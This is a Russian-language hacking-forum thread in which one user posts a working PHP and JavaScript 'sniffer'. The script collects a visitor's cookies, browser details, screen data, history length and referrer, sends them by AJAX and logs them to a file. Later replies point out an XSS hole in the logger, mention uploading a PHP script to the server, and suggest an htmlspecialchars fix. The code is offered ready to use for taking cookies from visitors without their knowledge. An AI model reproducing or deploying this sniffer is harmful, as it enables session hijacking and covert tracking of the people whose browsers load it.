1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

JS сниффер

Тема в разделе "Скрипты", создана пользователем ponchic, 3 июн 2015.

  1. TopicStarter Overlay
    ponchic

    ponchic юзверь

    Регистрация:
    15 дек 2013
    Сообщения:
    407
    Симпатии:
    276
    Пришлось ради + на експе по быстрому написать))
    В коде всё закоментировано

    index.php (называть именно так файл!):
    Код:
    <?php
    //Здесь думаю понятно
    if($_POST['x']){
    $fo = fopen("sniffed.html", "a+");
    fwrite($fo, htmlspecialchars($_POST['x'])); //Чтоб злые хакиры не взломали)
    fclose($fo);
    }
    ?>
    <html>
    <head>
    <script type='text/javascript'>
    
    ////By ponchic|||
    
    
    var browser = 'Информация о Вашем браузере: ' + navigator.userAgent + '(' + navigator.appName + ')' + '\nКодовое имя браузера: ' + navigator.appCodeName + '\n ОС: ' + navigator.platform + '\n <br>';
      //Проверим может ли Ваш браузер принимать cookie
    if ( navigator.cookieEnabled )
       var cook = 'Cookie: On \n';
    else
       var cook = 'Cookie: Off \n';
      if ( navigator.javaEnabled() == true) {
      var java = "Java: On \n";
      } else {
      var java = "Java: Off \n";
      }
    //Разрешение экрана и глубина цвета
        var screens = 'Разрешение экрана: <b>' + screen.width + ' X ' + screen.height + '</b>' + "\nГлубина цвета: " + screen.colorDepth + "<br>\n";
    
    // количество посещенных ссылок
    var historyL = "В истории ссылок: " + history.length + "<br>\n";
    
    //Cookie
    var cookieS = "\nCOOKIES: " + document.cookie;
    
    //Откуда пришёл
    var reffererS = "\nПришёл с: " + document.referrer + "\n \n _______________ \n \n";
    
    //Формируем тело отправки
    var sendtext = 'x=' + browser + cook + java + screens + historyL + cookieS + reffererS;
    
    //alert(sendtext); //Это я проверял
    
    //Отправляем ajax
    xhttp = new XMLHttpRequest();
    xhttp.onreadystatechange = function() {
       if ( xhttp.readyState == 4 && xhttp.status == 200 ) {
          sendtext.innerHTML=xhttp.responseText; //check all time
         }
       }
    xhttp.open('POST','index.php',true); //Открываем
    xhttp.setRequestHeader('Content-type','application/x-www-form-urlencoded');
    xhttp.send(sendtext); //Отправляем
    
    
    </script>
    </head>
    <body></body>
    </html>
    
    
    
     
    • Like Like x 2
    Последнее редактирование: 4 июн 2015
    Метки:
  2. AngryBSOD

    AngryBSOD

    Регистрация:
    6 мар 2015
    Сообщения:
    165
    Симпатии:
    140
    Залей на хостинг и кинь мне ссылку... Я кое что покажу...
     
  3. TopicStarter Overlay
    ponchic

    ponchic юзверь

    Регистрация:
    15 дек 2013
    Сообщения:
    407
    Симпатии:
    276
    Лень
     
  4. K_NoW

    K_NoW HackMe Please

    Регистрация:
    16 мар 2014
    Сообщения:
    464
    Симпатии:
    222
    го Please login or register to view links
     
  5. AngryBSOD

    AngryBSOD

    Регистрация:
    6 мар 2015
    Сообщения:
    165
    Симпатии:
    140
    Шелл я не залил, но XSS есть там точно))))))))))))))))
    --- Добавил сообщение, 4 июн 2015 ---
    ему бы все это дело в htmlspecialchars загнать)
     
  6. TopicStarter Overlay
    ponchic

    ponchic юзверь

    Регистрация:
    15 дек 2013
    Сообщения:
    407
    Симпатии:
    276
    В куку на это странице зальешь себе <b>Hacked by AngryBsod</b>?
     
  7. AngryBSOD

    AngryBSOD

    Регистрация:
    6 мар 2015
    Сообщения:
    165
    Симпатии:
    140
    Нет, можно залить php скрипт)
     
  8. TopicStarter Overlay
    ponchic

    ponchic юзверь

    Регистрация:
    15 дек 2013
    Сообщения:
    407
    Симпатии:
    276
    Нинада)
     
  9. AngryBSOD

    AngryBSOD

    Регистрация:
    6 мар 2015
    Сообщения:
    165
    Симпатии:
    140
    замени
    fwrite($fo, $_POST['x']);
    на
    fwrite($fo, htmlspecialchars($_POST['x']));
     
    • Like Like x 1
  10. TopicStarter Overlay
    ponchic

    ponchic юзверь

    Регистрация:
    15 дек 2013
    Сообщения:
    407
    Симпатии:
    276
    UPDATE обновил код
     

Поделиться этой страницей

Загрузка...